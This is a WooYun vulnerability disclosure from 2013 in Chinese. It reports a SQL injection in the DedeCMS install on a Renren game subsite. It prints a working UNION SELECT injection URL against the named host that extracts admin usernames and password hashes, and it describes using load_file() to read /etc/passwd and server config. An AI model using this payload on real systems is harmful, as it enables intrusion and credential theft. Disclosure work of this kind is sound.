人人网某分站SQL注入漏洞

漏洞概要

缺陷编号:WooYun-2013-018088

漏洞标题:人人网某分站SQL注入漏洞

相关厂商:人人网

漏洞作者:txcbg

提交时间:2013-01-30 09:47

公开时间:2013-03-16 09:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2013-01-30: 细节已通知厂商并且等待厂商处理中
2013-01-30: 厂商已经确认,细节仅向厂商公开
2013-02-09: 细节向核心白帽子及相关领域专家公开
2013-02-19: 细节向普通白帽子公开
2013-03-01: 细节向实习白帽子公开
2013-03-16: 细节向公众公开

简要描述:

人人网某分站SQL注入漏洞,可导致任意文件读取。

详细说明:

人人网战天下游戏官方网站www.ztx.renren.com所利用的DedeCMS存在一个已经公布的SQL注入漏洞,通过注入漏洞可以获得管理员用户名、密码,连接数据库的用户等敏感信息,造成敏感信息泄露。并且发现可以在注入点通过load_file()函数读取文件内容,差不多相当于任意文件读取了。比如可以读取/etc/passwd,/etc/httpd/conf/httpd.conf等文件从而获得敏感信息。

漏洞证明:

利用网上已经公布的漏洞利用代码来爆管理员的用户名和密码:http://www.ztx.renren.com/plus/search.php?keyword=as&typeArr[111%3D@\')+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%23@__admin%23@\'+]=a成功爆出了两个管理员的用户名和加密的密码,如图1。

看了下连接数据库的用户,发现是root,如图2。

来张读取/etc/passwd的截图,如图3。

修复方案:

你们懂的。

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-01-30 12:38

厂商回复:

Tks!!!这些游戏论坛伤不起

最新状态:

暂无

评价

  1. 2010-01-01 00:00 zzR 白帽子 | Rank:1179 漏洞数:101)

    厉害!

  2. 2010-01-01 00:00 瘦蛟舞 白帽子 | Rank:634 漏洞数:67)

    DZ分享下google手法吧~嘿嘿

  3. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @瘦蛟舞 真相了

  4. 2010-01-01 00:00 botak 白帽子 | Rank:6 漏洞数:3)

    @txcbg 求怎么突破DEDE的这个exp 读取文件,写loadfile么,提示step2了。。。